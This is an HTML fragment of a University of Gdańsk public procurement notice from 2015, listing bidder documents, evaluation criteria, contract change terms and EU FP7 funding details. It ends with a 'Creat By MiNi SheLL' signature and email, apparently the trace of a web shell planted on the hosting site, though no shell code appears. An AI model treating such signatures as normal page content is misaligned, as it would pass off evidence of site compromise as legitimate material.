<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W  celu  potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda dołączenia  do  oferty fotografii, dla materiałów szczegółowo wskazanych w załączniku nr 2 do SIWZ - formularzu przedmiotowo-cenowym, których autentyczność musi zostać poświadczona przez Wykonawcę (np. poprzez zamieszczenie zapisu: potwierdzam autentyczność dokumentu).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.) formularz ofertowy - załącznik nr 1 do SIWZ, 
2.) formularz przedmiotowo- cenowy - załącznik nr 2 do SIWZ.  
3.) oświadczenie o podwykonawcach. Wykonawca wykonujący zamówienie wyłącznie siłami własnymi  nie dołącza do oferty załącznika nr 5 do SIWZ. 
4.) zaakceptowany przez Wykonawcę projekt umowy - załącznik nr 6 do SIWZ; Wykonawca może też zastosować się do informacji  zawartej w rozdz. XVI pkt. 1.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne zmiany postanowień umowy dopuszczalne  są w następujących przypadkach:
1.)	zmiany obowiązujących przepisów prawa,
2.)	zaistnienia siły wyższej,
3.)	wycofania z dystrybucji przedmiotu umowy (po terminie otwarcia ofert) i zastąpienia 
go materiałami o parametrach nie gorszych niż oferowane, za cenę taką jak ustalona 
w umowie. Fakt ten Wykonawca musi pisemnie udokumentować, a Zamawiający musi wyrazić na zmianę zgodę,
4.)	zmiany terminu realizacji umowy, jeżeli uzasadnione to będzie okolicznościami leżącymi 
po stronie Zamawiającego, w szczególności sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub technicznymi,
5.)	zmiany dotyczącej w szczególności terminu realizacji zamówienia, gdy zaistniała inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ.
2.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej w postaci aneksu podpisanego i zatwierdzonego przez obie strony.
3.	Wniosek  o  wprowadzenie zmian, o których  mowa w  ust. 1 pkt. 1) - 5) musi  być  złożony 
na  piśmie i uzasadniony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Gdański, Dział Zamówień Publicznych, pokój 124, ul. Bażyńskiego 1a, 80-952 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2015 godzina 10:00, miejsce: Uniwersytet Gdański, Dział Zamówień Publicznych, pokój 124, ul. Bażyńskiego 1a, 80-952 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach 7 Programu Ramowego, 
tytuł  projektu: MOBI4Health CENTRE OF MOLECULAR BIOTECHNOLOGY FOR HEALTHY LIFE: Biotech solutions bringing health to living organisms and environment supported by mass spec-focused research platform, nr  umowy 316094..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com